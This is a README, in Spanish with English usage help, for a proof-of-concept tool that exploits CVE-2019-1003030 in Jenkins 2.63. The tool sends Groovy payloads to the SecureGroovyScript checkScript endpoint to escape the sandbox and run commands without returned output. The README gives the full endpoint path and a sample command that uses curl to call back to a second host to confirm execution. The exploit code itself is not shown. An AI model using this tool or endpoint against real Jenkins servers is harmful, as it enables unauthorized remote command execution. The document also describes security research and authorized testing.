
PoC para jenkins 2.63 CVE-2019-1003030
Este proyecto automatiza la creación y entrega de cargas útiles Groovy al endpoint de validación SecureGroovyScript de Jenkins utilizado por Jenkins 2.63. La herramienta admite tanto la ejecución interactiva como la de un solo uso. El exploit no devuelve salida, por lo que tendrás que hacer algunas validaciones como hacer curl a tu AP para asegurarte de que funciona.
La herramienta admite ambos:
Aviso legal
Este proyecto está destinado únicamente para investigación de seguridad, CTFs, entornos de laboratorio y pruebas de penetración autorizadas. No lo utilices contra sistemas sin permiso explícito.
usage: Poc.py -u http://10.10.10.10:8080/ [-c 'curl http://10.10.10.9/callback'] [-X POST] [-p /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript]
PoC for sandbox bypass for jenkins 2.63
options:
-h, --help show this help message and exit
-u, --url URL ip of target
-X, --method METHOD post or get
-b, --breadcrum BREADCRUM
optional jenkins crumb string
-c, --command COMMAND
command to run on jenkins, not output expected
-p, --path PATH path to the script, you might prepend more
Omite la opción -c para entrar en un prompt interactivo. El ejemplo de abajo, lamentablemente, no devuelve salida, así que mientras no obtengas un 404 debería estar funcionando.
